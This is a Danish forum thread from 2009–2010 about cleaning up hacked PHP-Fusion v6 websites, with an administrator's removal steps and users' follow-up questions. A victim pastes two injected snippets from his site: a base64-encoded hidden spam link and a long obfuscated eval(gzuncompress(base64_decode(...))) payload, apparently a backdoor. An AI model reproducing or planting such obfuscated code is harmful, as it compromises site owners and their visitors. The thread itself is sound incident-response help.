|
TIL ALLE V6 SIDER !! NYT HACK !! - BLANK SKÆRM
|
| Smokeman |
Lagt på d. 27-11-2009 01:04
|
Super Administrator
Antal indlæg: 12086
Tilmeldt: 25.01.08
Sidst set: 04.03.13
On/Offline:
Offline
Status:
Far til fire :-)
Dagens humør:
|
Til alle V6-brugere:
Slet omgående mappen member_poll_panel fra din FTP-Server !!!
Hvis din side allerede er blevet hacked:
1. Hvis du har nogle brugerafstemninger igang - så slå dem fra via: Administration->System->Elementer. Og derefter slet elementet!.
2. Åben filen: /themes/DIT_TEMA/theme.php - og slet den lange kodestump som ligger i nærheden af toppen af filen. Du kan ikke undgå at se det. Det er en masse sammenhængende tekst/volapyk.
3. Slet mappen: /infusions/member_poll_panel
4. Åben phpMyAdmin.
5. Klik i venstre side på "fusion_panels".
6. Slet panel_name: System / panel_filename: ../images/panel.php
7. Tjek om der ligger mere end 1 .php-fil på flg. destinationer. Filen hedder muligvis panel.php samt n.php:
Filer med "snavs" fjernet fra:
- /n.php
- /images/panel.php
- /images/avatars/panel.php
- /infusions/navigation_panel/archive.php
- ja, tjek hellere alle mapper der indeholder en mappe med navnet images.
- Finder du en/flere af disse filer - så slet dem!
8. Udskift derefter flg.:
Til selve siden:
-----------------
- Kodeord.
FTP:
-----
- Kodeord.
MySQL/PHP MyAdmin:
-------------------------
- Kodeord.
Til udbyderens kontrolpanel:
--------------------------------
- Kodeord.
Så skulle du/I gerne være på dem sikre side igen. 
Redigeret af Smokeman d. 27-11-2009 06:07 |
|
|
|
|
|
|
| Berit |
Lagt på d. 27-11-2009 04:09
|
Bruger
Antal indlæg: 32
Tilmeldt: 07.07.08
Sidst set: 08.01.10
On/Offline:
Offline
Status:
Ingen status er valgt
Dagens humør:
Ikke valgt
|
Hej Smokeman!
Uha, dog!
Som jeg allerede har nævnt i en anden debat:
Min side har været blå hele dagen - ikke blot i aften/nat!
Jeg troede, at det var fordi du arbejdede med den!
Men jeg siger mange tak fordi du gerne vil hjælpe mig med at fikse problemet! Det er en KÆMPE hjælp!
Hilsen Berit
 |
|
|
|
|
|
|
| Smokeman |
Lagt på d. 27-11-2009 04:14
|
Super Administrator
Antal indlæg: 12086
Tilmeldt: 25.01.08
Sidst set: 04.03.13
On/Offline:
Offline
Status:
Far til fire :-)
Dagens humør:
|
Så kører den - men dog lidt i "halte-sporet", indtil jeg lige får det hele gået igennem. |
|
|
|
|
|
|
| Berit |
Lagt på d. 27-11-2009 04:36
|
Bruger
Antal indlæg: 32
Tilmeldt: 07.07.08
Sidst set: 08.01.10
On/Offline:
Offline
Status:
Ingen status er valgt
Dagens humør:
Ikke valgt
|
Hej Smokeman!
Super!
Mange tak skal du endnu engang have! 
Jeg glæder mig utrolig meget til siden er kommet op at stå igen!
Hilsen Berit
|
|
|
|
|
|
|
| Eddy |
Lagt på d. 27-11-2009 04:50
|
Super bruger
Antal indlæg: 2365
Tilmeldt: 03.04.08
Sidst set: 14.01.13
On/Offline:
Offline
Status:
Skriv status..
Dagens humør:
|
Hej Smorkman
Jeg har sendt en PB til dig, 1000 tak fordi du vil hjælpe Berit, jeg var gået i seng, for jeg skal ud og køre med mad i morgen, så jeg går i kassen igen. jeg venter lige en kop kaffe hvis du skal bruge mere.
Redigeret af Eddy d. 27-11-2009 04:53
Med venlig hilden
![www.dy-opdraet.dansk-undulat-sport.dk/images/avatars/fugleeddy[1].gif](http://www.dy-opdraet.dansk-undulat-sport.dk/images/avatars/fugleeddy[1].gif)
Eddy |
|
|
|
|
|
|
| Smokeman |
Lagt på d. 27-11-2009 04:52
|
Super Administrator
Antal indlæg: 12086
Tilmeldt: 25.01.08
Sidst set: 04.03.13
On/Offline:
Offline
Status:
Far til fire :-)
Dagens humør:
|
Ingen problem. |
|
|
|
|
|
|
| Lars |
Lagt på d. 27-11-2009 05:11
|
Medium bruger
Antal indlæg: 285
Tilmeldt: 15.04.08
Sidst set: 06.01.10
On/Offline:
Offline
Status:
Mailproblemer der driver mig til vanvid
Dagens humør:
|
Smokeman,
Hvis nogen er værd at spørge, så ved jeg jo, at det er dig.
Du ved hvad du snakker om.
Selv har jeg arbejdsmæssigt været offline i lang tid her, om end jeg får dine nyhedsbreve, og her følger debatter.
Jeg er blot begyndt at tænke, at PHP Fusion er vokset sig selv over ende, og at systemets sikkerhed således totalt er røget fløjten.
Selv er jeg yderst betænkelig ved, at her måske skulle starte et sådan system op igen.
Hvad siger du om dette ?
MVH,
Lars |
|
|
|
|
|
|
| Smokeman |
Lagt på d. 27-11-2009 05:26
|
Super Administrator
Antal indlæg: 12086
Tilmeldt: 25.01.08
Sidst set: 04.03.13
On/Offline:
Offline
Status:
Far til fire :-)
Dagens humør:
|
@Lars: Hmm, jeg har nu, 7-9-13, aldrig været udsat for hack. Hvis man holder sig opdateret på de forskellige fronter, ja så ser jeg egentligt ikke det som et problem.
@Berit: Så er Jeres side klar - og fri for snavs igen. |
|
|
|
|
|
|
| Berit |
Lagt på d. 27-11-2009 13:21
|
Bruger
Antal indlæg: 32
Tilmeldt: 07.07.08
Sidst set: 08.01.10
On/Offline:
Offline
Status:
Ingen status er valgt
Dagens humør:
Ikke valgt
|
Hej Smokeman!
Hvor er det bare super dejligt at høre!
Endnu engang mange TAK!
Hilsen Berit
|
|
|
|
|
|
|
| Ludvig_71 |
Lagt på d. 30-11-2009 09:07
|
Junior bruger
Antal indlæg: 11
Tilmeldt: 30.11.09
Sidst set: 16.02.11
On/Offline:
Offline
Status:
Ingen status er valgt
Dagens humør:
Ikke valgt
|
Hej Smokeman
Jeg henvender mig her, da du sikkert er eksperten omkring hack på PHP-Fusion v6.
Jeg skrev lørdag aften, at jeg på min hjemmeside www.kcc-motion.dk også var blevet inficeret, og troede egentlig den var løst, da det lykkedes mig at få siden til at køre igen. Men da jeg var på igen igår, var den gal igen. Siden er dog ikke blank denne gang, men nu kan den ikke skabe kontakt til MySQL.
Som beskrevet ovenfor, så har jeg ændret password diverse steder, inkl. MySQL serveren.
Men jeg har et spørgsmål til en fil der ligger i formu/attachments/svn, den hedder index.php, den bliver henvist fra index.php ude i roden.
Jeg kan se i denne fil, at der også er "snavs" i, men jeg kan ikke gennemskue, hvad der skal stå i filen.
Teksten ser således ud uden anførselstegn :
 Kode<?php echo(base64_decode('PHNwYW4gc3R5bGU9ImhlaWdodDogMHB0O3dpZHRoOiAzcHQ7cG9zaXRpb246IGFic29sdXRlO292ZXJmbG93OiBhdXRvOyI+PGEgaHJlZj0iaHR0cDovL3d3dy5rb2xhcnN0d28ub3JnLnBsL3Nob3AvYWxsZXJneS9wYWdlXzAuaHRtbCI+d2hlcmUgY29zdCB1bmNvc3RseSBkcnVnIGFsbGVyZ3k8L2E+PC9zcGFuPg==')); ?>
Ligeledes har jeg fundet filen archive_panel.php, i mappen infusions/navigation_panel som du beskriver. Teksten ser således ud, uden anførselstegn :
Kode <?eval(gzuncompress(base64_decode('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')));?>
Heller ikke den fil kan jeg se, hvad der skal stå, og hvad der skal slettes.
Håber du kan hjælpe
Mvh
Gert
* Kode indsat i kode-tags - Admin.
Redigeret af Smokeman d. 30-11-2009 15:38 |
|
|
|
|
|
|
| Smokeman |
Lagt på d. 30-11-2009 15:44
|
Super Administrator
Antal indlæg: 12086
Tilmeldt: 25.01.08
Sidst set: 04.03.13
On/Offline:
Offline
Status:
Far til fire :-)
Dagens humør:
|
Hej Gert.
1. Du skal ligeledes angive det nye mySQL kodeord i filen /config.php
2. /forum/attachments skal kun indeholde 1 .php-fil = index.php denne fil skal INTET indeholde. Ikke et eneste bogstav/tegn. Så slet alt der er i den.
3. Filen /infusions/member_poll_panel/archive_panel.php - skal lieledes slettes. Det er en ekstra fil hackerne har lagt ind. |
|
|
|
|
|
|
| Ludvig_71 |
Lagt på d. 30-11-2009 16:38
|
Junior bruger
Antal indlæg: 11
Tilmeldt: 30.11.09
Sidst set: 16.02.11
On/Offline:
Offline
Status:
Ingen status er valgt
Dagens humør:
Ikke valgt
|
Hej Smokeman
Så lykkedes det at få siden til at køre igen, var ikke lige opmærksom på, at config filen også skulle ændres med password. Dette kan dog godt bekymre mig lidt, at der står et synligt password, hvis hackere har haft adgang til at kunne ændre i andre filer på serveren.
Håber jeg kan holde den fri af hacker angreb, og så er det vist på tide at få den opgraderet til v7.
Stor tak for hjælpen.
Mvh
Gert |
|
|
|
|
|
|
| Smokeman |
Lagt på d. 30-11-2009 16:47
|
Super Administrator
Antal indlæg: 12086
Tilmeldt: 25.01.08
Sidst set: 04.03.13
On/Offline:
Offline
Status:
Far til fire :-)
Dagens humør:
|
Jamen du skal også ændre dit password - men det har du jo også gjort. Og du har helt ret: De kunne se dit password - men du er nu på den sikre side idet du har ændret det. |
|
|
|
|
|
|
| Eddy |
Lagt på d. 30-11-2009 21:25
|
Super bruger
Antal indlæg: 2365
Tilmeldt: 03.04.08
Sidst set: 14.01.13
On/Offline:
Offline
Status:
Skriv status..
Dagens humør:
|
@Gert
Ind til du får din side opgaderet til V7, vil det være klogt at få din side opdateret, til v6.01.19 som Smokeman har gjort os opmærksom på:
Med venlig hilden
Eddy |
|
|
|
|
|
|
| Smokeman |
Lagt på d. 30-11-2009 21:32
|
Super Administrator
Antal indlæg: 12086
Tilmeldt: 25.01.08
Sidst set: 04.03.13
On/Offline:
Offline
Status:
Far til fire :-)
Dagens humør:
|
Lige præcis, Eddy!
Det havde jeg glemt at nævne i farten. Tak for påmindelsen min ven! |
|
|
|
|
|
|
| MTeis |
Lagt på d. 08-08-2010 19:11
|
Junior bruger
Antal indlæg: 23
Tilmeldt: 03.03.08
Sidst set: 14.01.13
On/Offline:
Offline
Status:
Super hjælp fra Smokeman
Dagens humør:
|
Hej Smoke,
Jeg forstår ikke helt:
6. Slet panel_name: System / panel_filename: ../images/panel.php
i indlæg nr. 1 |
|
|
|
|
|
|
| Smokeman |
Lagt på d. 09-08-2010 14:43
|
Super Administrator
Antal indlæg: 12086
Tilmeldt: 25.01.08
Sidst set: 04.03.13
On/Offline:
Offline
Status:
Far til fire :-)
Dagens humør:
|
Hej med dig.
Når du er i phpMyAdmin - i tabellen fusion_panels - så kan du se de 2 jeg mener. Kig på vedhæftede billede her:
Smokeman tilknyttede følgende billede:
 |
|
|
|
|
|
Gæster online: 7
